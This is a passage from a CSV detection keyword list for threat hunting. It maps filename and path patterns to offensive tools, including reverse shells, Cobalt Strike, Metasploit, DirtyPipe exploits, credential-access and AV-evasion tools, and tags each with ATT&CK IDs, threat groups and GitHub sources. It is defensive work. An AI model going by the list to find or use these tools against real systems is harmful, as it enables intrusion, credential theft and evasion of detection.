T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*/custom_payload_generator/*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" +"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/CVE*/chocobo_root*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*/CVE-*_EXPLOIT_0DAY/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z"
+"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/CVE-2009-2698/katon.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/CVE-2022-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*/CVE-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z"
+"*/CVE-2022-0847/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe 
vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/CVE-2022-0847-dirty-pipe-checker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" +"*/CVE-2022-0847-DirtyPipe-Exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","10","1057","223","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z" +"*/CVE-2022-0847-dirty-pipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","1","2","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z" +"*/CVE-2022-0847-Docker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z" +"*/cve-2022-23131-exp/blob/main/zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" +"*/CVE-2022-26809-RCE*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library 
CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" +"*/CVE-2023-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CVE-2023-34362.git*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" +"*/CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*/cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CWoNaJLBo/VTNeWw11212/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/CWoNaJLBo/VTNeWw11213/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/Cybellum*","offensive_tool_keyword","Github Username","Zero day code injection and vulnerabilities github repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Cybellum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CyDefUnicorn*","offensive_tool_keyword","Github Username","pentest tools repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/D1rkInject.git*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*/d4em0n/exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/DAMP.git*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*/DanMcInerney/ridenum*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/daphne.git*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*/daphne-x64*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*/darkarmour.git*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/darkhotel.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*/darkweb2017-top100.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/DarkWidow.git*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/empire.db*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter 
- FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/nxc.conf*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dazzleUP.git*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and 